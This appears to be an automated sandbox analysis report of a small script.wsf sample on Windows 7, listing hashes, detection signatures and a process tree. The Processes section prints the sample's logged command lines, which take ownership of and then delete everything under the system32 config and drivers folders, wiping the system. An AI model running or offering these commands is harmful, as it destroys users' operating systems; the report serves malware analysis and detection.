Analysis
-
max time kernel
119s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
15-08-2024 21:30
Static task
static1
Behavioral task
behavioral1
Sample
script.wsf
Resource
win7-20240708-en
General
-
Target
script.wsf
-
Size
2KB
-
MD5
cef6ac1c7b72212cb9b26421ba748362
-
SHA1
05858a591fc90a1af835454aee11b7d893649517
-
SHA256
92a5545652c35328d20dc8bb70348ebda3b1eb49b1c0f111976ab3912de1801a
-
SHA512
435bcf3fa63381455db93dc4f13be02a276e351721a726fcea1c5a2ef93037e09bac09c5dbaf76b1ceb9e97a39d360a73fd9a7316f32b1c582e4bc738fe21e1c
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 2636 takeown.exe 2632 takeown.exe 2316 icacls.exe 2772 icacls.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exeicacls.exetakeown.exetakeown.exepid process 2316 icacls.exe 2772 icacls.exe 2636 takeown.exe 2632 takeown.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
takeown.exedescription pid process Token: SeTakeOwnershipPrivilege 2632 takeown.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
cmd.exeWScript.execmd.execmd.exedescription pid process target process PID 2372 wrote to memory of 320 2372 cmd.exe WScript.exe PID 2372 wrote to memory of 320 2372 cmd.exe WScript.exe PID 2372 wrote to memory of 320 2372 cmd.exe WScript.exe PID 320 wrote to memory of 2824 320 WScript.exe cmd.exe PID 320 wrote to memory of 2824 320 WScript.exe cmd.exe PID 320 wrote to memory of 2824 320 WScript.exe cmd.exe PID 320 wrote to memory of 2808 320 WScript.exe cmd.exe PID 320 wrote to memory of 2808 320 WScript.exe cmd.exe PID 320 wrote to memory of 2808 320 WScript.exe cmd.exe PID 2824 wrote to memory of 2636 2824 cmd.exe takeown.exe PID 2824 wrote to memory of 2636 2824 cmd.exe takeown.exe PID 2824 wrote to memory of 2636 2824 cmd.exe takeown.exe PID 2808 wrote to memory of 2632 2808 cmd.exe takeown.exe PID 2808 wrote to memory of 2632 2808 cmd.exe takeown.exe PID 2808 wrote to memory of 2632 2808 cmd.exe takeown.exe PID 2824 wrote to memory of 2316 2824 cmd.exe icacls.exe PID 2824 wrote to memory of 2316 2824 cmd.exe icacls.exe PID 2824 wrote to memory of 2316 2824 cmd.exe icacls.exe PID 2808 wrote to memory of 2772 2808 cmd.exe icacls.exe PID 2808 wrote to memory of 2772 2808 cmd.exe icacls.exe PID 2808 wrote to memory of 2772 2808 cmd.exe icacls.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf thescript.vbs && start thescript.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:320 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\config\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2636
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\config\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\drivers\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\drivers\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2772
-
-
-
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T1⤵PID:2152
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5cef6ac1c7b72212cb9b26421ba748362
SHA105858a591fc90a1af835454aee11b7d893649517
SHA25692a5545652c35328d20dc8bb70348ebda3b1eb49b1c0f111976ab3912de1801a
SHA512435bcf3fa63381455db93dc4f13be02a276e351721a726fcea1c5a2ef93037e09bac09c5dbaf76b1ceb9e97a39d360a73fd9a7316f32b1c582e4bc738fe21e1c
-
Filesize
98B
MD54b91264568ac2162700be36338c095e8
SHA1c95726edf8303e6adabcb12ffdca90b51349990a
SHA2562c8545e54e8fbc28791314d7327886237c66b70640d069f276a35b6c3322c037
SHA512e57319453e5da3407ccc77cb3ee6200592e1916932cae467bbf77722f3ff49e5853b4b4d2eeb3092dbb2e22346f56617cc785744771bb3648bf4561feb0e9e1b